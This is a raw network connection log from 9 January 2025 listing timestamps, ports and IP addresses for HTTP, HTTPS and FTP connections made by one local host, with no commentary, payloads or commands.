Jan 9, 2025 16:36:07.011006117 CET	49743	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:07.011344910 CET	49743	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:07.017206907 CET	49744	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:07.022032976 CET	80	49744	193.122.130.0	192.168.2.4
Jan 9, 2025 16:36:07.022110939 CET	49744	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:07.022197962 CET	49744	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:07.026971102 CET	80	49744	193.122.130.0	192.168.2.4
Jan 9, 2025 16:36:07.071619034 CET	443	49742	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:07.071779966 CET	443	49742	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:07.071860075 CET	49742	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:07.080348015 CET	49742	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:07.084819078 CET	49740	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:07.089652061 CET	80	49740	193.122.130.0	192.168.2.4
Jan 9, 2025 16:36:07.322189093 CET	80	49740	193.122.130.0	192.168.2.4
Jan 9, 2025 16:36:07.323983908 CET	49745	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:07.324022055 CET	443	49745	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:07.324084044 CET	49745	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:07.324470997 CET	49745	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:07.324484110 CET	443	49745	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:07.367480993 CET	49740	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:07.557416916 CET	80	49744	193.122.130.0	192.168.2.4
Jan 9, 2025 16:36:07.558650017 CET	49746	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:07.558703899 CET	443	49746	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:07.558783054 CET	49746	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:07.559082031 CET	49746	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:07.559093952 CET	443	49746	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:07.600096941 CET	49744	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:07.785274029 CET	443	49745	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:07.787408113 CET	49745	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:07.787447929 CET	443	49745	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:08.151648045 CET	443	49745	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:08.151724100 CET	443	49745	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:08.151763916 CET	49745	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:08.152373075 CET	49745	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:08.153327942 CET	443	49746	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:08.154596090 CET	49746	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:08.154620886 CET	443	49746	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:08.155426025 CET	49740	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:08.156579971 CET	49747	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:08.160377979 CET	80	49740	193.122.130.0	192.168.2.4
Jan 9, 2025 16:36:08.160442114 CET	49740	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:08.161410093 CET	80	49747	193.122.130.0	192.168.2.4
Jan 9, 2025 16:36:08.161479950 CET	49747	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:08.161607981 CET	49747	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:08.166359901 CET	80	49747	193.122.130.0	192.168.2.4
Jan 9, 2025 16:36:08.289733887 CET	443	49746	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:08.289799929 CET	443	49746	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:08.289896011 CET	49746	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:08.290220976 CET	49746	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:08.293425083 CET	49744	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:08.294393063 CET	49748	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:08.298388004 CET	80	49744	193.122.130.0	192.168.2.4
Jan 9, 2025 16:36:08.298456907 CET	49744	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:08.299319029 CET	80	49748	193.122.130.0	192.168.2.4
Jan 9, 2025 16:36:08.299376011 CET	49748	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:08.299448013 CET	49748	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:08.304275990 CET	80	49748	193.122.130.0	192.168.2.4
Jan 9, 2025 16:36:08.635428905 CET	80	49747	193.122.130.0	192.168.2.4
Jan 9, 2025 16:36:08.636790037 CET	49749	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:08.636841059 CET	443	49749	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:08.637398958 CET	49749	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:08.637623072 CET	49749	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:08.637630939 CET	443	49749	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:08.679996967 CET	49747	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:08.771614075 CET	80	49748	193.122.130.0	192.168.2.4
Jan 9, 2025 16:36:08.772857904 CET	49750	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:08.772905111 CET	443	49750	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:08.772984028 CET	49750	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:08.773250103 CET	49750	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:08.773262978 CET	443	49750	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:08.820605040 CET	49748	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:09.097929955 CET	443	49749	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:09.099508047 CET	49749	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:09.099546909 CET	443	49749	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:09.238642931 CET	443	49750	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:09.240427971 CET	49750	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:09.240470886 CET	443	49750	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:09.244226933 CET	443	49749	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:09.244297981 CET	443	49749	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:09.244384050 CET	49749	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:09.245734930 CET	49749	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:09.273206949 CET	49751	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:09.278095007 CET	80	49751	193.122.130.0	192.168.2.4
Jan 9, 2025 16:36:09.278173923 CET	49751	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:09.278423071 CET	49751	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:09.283183098 CET	80	49751	193.122.130.0	192.168.2.4
Jan 9, 2025 16:36:09.371746063 CET	443	49750	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:09.371805906 CET	443	49750	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:09.371859074 CET	49750	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:09.372519970 CET	49750	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:09.375669956 CET	49748	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:09.376871109 CET	49752	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:09.380590916 CET	80	49748	193.122.130.0	192.168.2.4
Jan 9, 2025 16:36:09.380651951 CET	49748	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:09.381669998 CET	80	49752	193.122.130.0	192.168.2.4
Jan 9, 2025 16:36:09.381726027 CET	49752	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:09.381845951 CET	49752	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:09.386569977 CET	80	49752	193.122.130.0	192.168.2.4
Jan 9, 2025 16:36:09.768116951 CET	80	49751	193.122.130.0	192.168.2.4
Jan 9, 2025 16:36:09.769608021 CET	49753	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:09.769653082 CET	443	49753	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:09.769717932 CET	49753	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:09.769972086 CET	49753	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:09.769988060 CET	443	49753	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:09.820610046 CET	49751	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:09.846118927 CET	80	49752	193.122.130.0	192.168.2.4
Jan 9, 2025 16:36:09.847543955 CET	49754	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:09.847600937 CET	443	49754	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:09.847767115 CET	49754	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:09.848031998 CET	49754	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:09.848050117 CET	443	49754	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:09.898741007 CET	49752	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:10.236143112 CET	443	49753	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:10.237696886 CET	49753	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:10.237725973 CET	443	49753	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:10.310477972 CET	443	49754	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:10.312618017 CET	49754	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:10.312655926 CET	443	49754	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:10.374449015 CET	443	49753	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:10.374504089 CET	443	49753	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:10.374572992 CET	49753	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:10.375055075 CET	49753	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:10.378694057 CET	49751	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:10.379697084 CET	49755	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:10.383984089 CET	80	49751	193.122.130.0	192.168.2.4
Jan 9, 2025 16:36:10.384057999 CET	49751	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:10.384510040 CET	80	49755	193.122.130.0	192.168.2.4
Jan 9, 2025 16:36:10.384573936 CET	49755	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:10.384701014 CET	49755	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:10.389432907 CET	80	49755	193.122.130.0	192.168.2.4
Jan 9, 2025 16:36:10.464821100 CET	443	49754	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:10.464966059 CET	443	49754	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:10.465599060 CET	49754	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:10.465599060 CET	49754	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:10.468620062 CET	49752	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:10.469404936 CET	49756	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:10.473742962 CET	80	49752	193.122.130.0	192.168.2.4
Jan 9, 2025 16:36:10.473824978 CET	49752	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:10.474298000 CET	80	49756	193.122.130.0	192.168.2.4
Jan 9, 2025 16:36:10.474383116 CET	49756	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:10.474456072 CET	49756	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:10.479291916 CET	80	49756	193.122.130.0	192.168.2.4
Jan 9, 2025 16:36:10.866734028 CET	80	49755	193.122.130.0	192.168.2.4
Jan 9, 2025 16:36:10.868639946 CET	49757	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:10.868699074 CET	443	49757	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:10.869371891 CET	49757	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:10.869659901 CET	49757	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:10.869674921 CET	443	49757	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:10.914361000 CET	49755	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:10.967573881 CET	80	49756	193.122.130.0	192.168.2.4
Jan 9, 2025 16:36:10.969794035 CET	49758	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:10.969845057 CET	443	49758	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:10.969906092 CET	49758	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:10.970139980 CET	49758	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:10.970149040 CET	443	49758	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:11.023756027 CET	49756	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:11.328978062 CET	443	49757	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:11.383121014 CET	49757	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:11.458039999 CET	443	49758	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:11.489483118 CET	49758	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:11.489533901 CET	443	49758	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:11.543287992 CET	49757	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:11.543378115 CET	443	49757	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:11.612966061 CET	443	49758	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:11.613132000 CET	443	49758	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:11.613187075 CET	49758	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:11.613959074 CET	49758	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:11.633977890 CET	49756	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:11.635119915 CET	49759	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:11.639036894 CET	80	49756	193.122.130.0	192.168.2.4
Jan 9, 2025 16:36:11.639089108 CET	49756	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:11.639974117 CET	80	49759	193.122.130.0	192.168.2.4
Jan 9, 2025 16:36:11.640022993 CET	49759	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:11.640180111 CET	49759	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:11.644974947 CET	80	49759	193.122.130.0	192.168.2.4
Jan 9, 2025 16:36:11.674565077 CET	443	49757	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:11.674730062 CET	443	49757	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:11.674798012 CET	49757	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:11.675059080 CET	49757	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:11.678786993 CET	49755	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:11.679600954 CET	49760	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:11.683883905 CET	80	49755	193.122.130.0	192.168.2.4
Jan 9, 2025 16:36:11.683938026 CET	49755	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:11.684439898 CET	80	49760	193.122.130.0	192.168.2.4
Jan 9, 2025 16:36:11.684499979 CET	49760	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:11.684587002 CET	49760	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:11.689376116 CET	80	49760	193.122.130.0	192.168.2.4
Jan 9, 2025 16:36:12.117563963 CET	80	49759	193.122.130.0	192.168.2.4
Jan 9, 2025 16:36:12.118674040 CET	49761	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:12.118731976 CET	443	49761	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:12.118796110 CET	49761	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:12.119040966 CET	49761	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:12.119051933 CET	443	49761	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:12.156908989 CET	80	49760	193.122.130.0	192.168.2.4
Jan 9, 2025 16:36:12.158198118 CET	49762	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:12.158252001 CET	443	49762	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:12.159146070 CET	49762	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:12.159406900 CET	49762	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:12.159420967 CET	443	49762	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:12.164366007 CET	49759	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:12.211235046 CET	49760	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:12.573462963 CET	443	49761	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:12.575005054 CET	49761	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:12.575054884 CET	443	49761	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:12.615300894 CET	443	49762	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:12.616906881 CET	49762	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:12.616929054 CET	443	49762	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:12.798253059 CET	443	49761	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:12.798320055 CET	443	49761	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:12.798465967 CET	49761	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:12.799072981 CET	49761	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:12.860730886 CET	49759	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:12.866080999 CET	80	49759	193.122.130.0	192.168.2.4
Jan 9, 2025 16:36:12.866519928 CET	49759	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:12.868619919 CET	49763	443	192.168.2.4	149.154.167.220
Jan 9, 2025 16:36:12.868650913 CET	443	49763	149.154.167.220	192.168.2.4
Jan 9, 2025 16:36:12.868747950 CET	49763	443	192.168.2.4	149.154.167.220
Jan 9, 2025 16:36:12.869302988 CET	49763	443	192.168.2.4	149.154.167.220
Jan 9, 2025 16:36:12.869316101 CET	443	49763	149.154.167.220	192.168.2.4
Jan 9, 2025 16:36:12.903176069 CET	443	49762	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:12.903249025 CET	443	49762	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:12.903508902 CET	49762	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:12.903805017 CET	49762	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:12.907330990 CET	49760	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:12.908607006 CET	49764	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:12.912218094 CET	80	49760	193.122.130.0	192.168.2.4
Jan 9, 2025 16:36:12.912275076 CET	49760	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:12.913372040 CET	80	49764	193.122.130.0	192.168.2.4
Jan 9, 2025 16:36:12.913435936 CET	49764	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:12.913570881 CET	49764	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:12.918289900 CET	80	49764	193.122.130.0	192.168.2.4
Jan 9, 2025 16:36:13.371639013 CET	80	49764	193.122.130.0	192.168.2.4
Jan 9, 2025 16:36:13.372699022 CET	49766	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:13.372765064 CET	443	49766	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:13.372843027 CET	49766	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:13.373117924 CET	49766	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:13.373136997 CET	443	49766	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:13.411420107 CET	49764	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:13.487251043 CET	443	49763	149.154.167.220	192.168.2.4
Jan 9, 2025 16:36:13.487366915 CET	49763	443	192.168.2.4	149.154.167.220
Jan 9, 2025 16:36:13.491009951 CET	49763	443	192.168.2.4	149.154.167.220
Jan 9, 2025 16:36:13.491023064 CET	443	49763	149.154.167.220	192.168.2.4
Jan 9, 2025 16:36:13.491276026 CET	443	49763	149.154.167.220	192.168.2.4
Jan 9, 2025 16:36:13.492810011 CET	49763	443	192.168.2.4	149.154.167.220
Jan 9, 2025 16:36:13.535327911 CET	443	49763	149.154.167.220	192.168.2.4
Jan 9, 2025 16:36:13.730673075 CET	443	49763	149.154.167.220	192.168.2.4
Jan 9, 2025 16:36:13.730745077 CET	443	49763	149.154.167.220	192.168.2.4
Jan 9, 2025 16:36:13.730793953 CET	49763	443	192.168.2.4	149.154.167.220
Jan 9, 2025 16:36:13.736422062 CET	49763	443	192.168.2.4	149.154.167.220
Jan 9, 2025 16:36:13.850512028 CET	443	49766	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:13.852247953 CET	49766	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:13.852276087 CET	443	49766	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:13.987179041 CET	443	49766	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:13.987370014 CET	443	49766	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:13.987471104 CET	49766	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:14.057065964 CET	49766	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:14.236321926 CET	49764	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:14.236639977 CET	49767	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:14.241588116 CET	80	49767	193.122.130.0	192.168.2.4
Jan 9, 2025 16:36:14.241612911 CET	80	49764	193.122.130.0	192.168.2.4
Jan 9, 2025 16:36:14.241684914 CET	49764	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:14.241693020 CET	49767	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:14.242419004 CET	49767	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:14.247355938 CET	80	49767	193.122.130.0	192.168.2.4
Jan 9, 2025 16:36:14.719979048 CET	80	49767	193.122.130.0	192.168.2.4
Jan 9, 2025 16:36:14.723402977 CET	49769	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:14.723445892 CET	443	49769	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:14.723526001 CET	49769	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:14.723819017 CET	49769	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:14.723836899 CET	443	49769	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:14.773751020 CET	49767	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:15.200236082 CET	443	49769	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:15.202142954 CET	49769	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:15.202169895 CET	443	49769	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:15.340081930 CET	443	49769	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:15.340172052 CET	443	49769	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:15.340219021 CET	49769	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:15.340727091 CET	49769	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:15.343828917 CET	49767	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:15.344969988 CET	49772	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:15.348922014 CET	80	49767	193.122.130.0	192.168.2.4
Jan 9, 2025 16:36:15.348990917 CET	49767	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:15.349798918 CET	80	49772	193.122.130.0	192.168.2.4
Jan 9, 2025 16:36:15.349877119 CET	49772	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:15.349977970 CET	49772	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:15.354793072 CET	80	49772	193.122.130.0	192.168.2.4
Jan 9, 2025 16:36:16.082178116 CET	80	49772	193.122.130.0	192.168.2.4
Jan 9, 2025 16:36:16.086087942 CET	49774	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:16.086154938 CET	443	49774	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:16.086267948 CET	49774	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:16.086798906 CET	49774	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:16.086836100 CET	443	49774	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:16.133148909 CET	49772	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:16.561492920 CET	443	49774	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:16.574947119 CET	49774	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:16.575042009 CET	443	49774	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:16.703396082 CET	443	49774	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:16.703473091 CET	443	49774	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:16.703562021 CET	49774	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:16.704195023 CET	49774	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:16.715459108 CET	49772	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:16.716322899 CET	49775	443	192.168.2.4	149.154.167.220
Jan 9, 2025 16:36:16.716351986 CET	443	49775	149.154.167.220	192.168.2.4
Jan 9, 2025 16:36:16.716681957 CET	49775	443	192.168.2.4	149.154.167.220
Jan 9, 2025 16:36:16.717164040 CET	49775	443	192.168.2.4	149.154.167.220
Jan 9, 2025 16:36:16.717179060 CET	443	49775	149.154.167.220	192.168.2.4
Jan 9, 2025 16:36:16.720386028 CET	80	49772	193.122.130.0	192.168.2.4
Jan 9, 2025 16:36:16.720443010 CET	49772	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:17.383668900 CET	443	49775	149.154.167.220	192.168.2.4
Jan 9, 2025 16:36:17.383754015 CET	49775	443	192.168.2.4	149.154.167.220
Jan 9, 2025 16:36:17.385561943 CET	49775	443	192.168.2.4	149.154.167.220
Jan 9, 2025 16:36:17.385574102 CET	443	49775	149.154.167.220	192.168.2.4
Jan 9, 2025 16:36:17.385974884 CET	443	49775	149.154.167.220	192.168.2.4
Jan 9, 2025 16:36:17.388111115 CET	49775	443	192.168.2.4	149.154.167.220
Jan 9, 2025 16:36:17.431341887 CET	443	49775	149.154.167.220	192.168.2.4
Jan 9, 2025 16:36:17.745168924 CET	443	49775	149.154.167.220	192.168.2.4
Jan 9, 2025 16:36:17.745251894 CET	443	49775	149.154.167.220	192.168.2.4
Jan 9, 2025 16:36:17.745337009 CET	49775	443	192.168.2.4	149.154.167.220
Jan 9, 2025 16:36:17.748466015 CET	49775	443	192.168.2.4	149.154.167.220
Jan 9, 2025 16:36:27.068003893 CET	49741	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:27.130376101 CET	49747	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:27.181751013 CET	49777	21	192.168.2.4	50.31.176.103
Jan 9, 2025 16:36:27.185859919 CET	49778	21	192.168.2.4	50.31.176.103
Jan 9, 2025 16:36:27.186706066 CET	21	49777	50.31.176.103	192.168.2.4
Jan 9, 2025 16:36:27.186791897 CET	49777	21	192.168.2.4	50.31.176.103
Jan 9, 2025 16:36:27.190831900 CET	21	49778	50.31.176.103	192.168.2.4
Jan 9, 2025 16:36:27.190903902 CET	49778	21	192.168.2.4	50.31.176.103
Jan 9, 2025 16:36:27.279165983 CET	49777	21	192.168.2.4	50.31.176.103
Jan 9, 2025 16:36:27.284997940 CET	21	49777	50.31.176.103	192.168.2.4
Jan 9, 2025 16:36:27.285084009 CET	49777	21	192.168.2.4	50.31.176.103
Jan 9, 2025 16:36:27.697698116 CET	21	49778	50.31.176.103	192.168.2.4
Jan 9, 2025 16:36:27.697879076 CET	49778	21	192.168.2.4	50.31.176.103
Jan 9, 2025 16:36:27.702683926 CET	21	49778	50.31.176.103	192.168.2.4
Jan 9, 2025 16:36:27.816128969 CET	21	49778	50.31.176.103	192.168.2.4
Jan 9, 2025 16:36:27.816339016 CET	49778	21	192.168.2.4	50.31.176.103
Jan 9, 2025 16:36:27.821218967 CET	21	49778	50.31.176.103	192.168.2.4
Jan 9, 2025 16:36:28.082225084 CET	21	49778	50.31.176.103	192.168.2.4
Jan 9, 2025 16:36:28.082417011 CET	49778	21	192.168.2.4	50.31.176.103
Jan 9, 2025 16:36:28.087299109 CET	21	49778	50.31.176.103	192.168.2.4
Jan 9, 2025 16:36:28.200855017 CET	21	49778	50.31.176.103	192.168.2.4
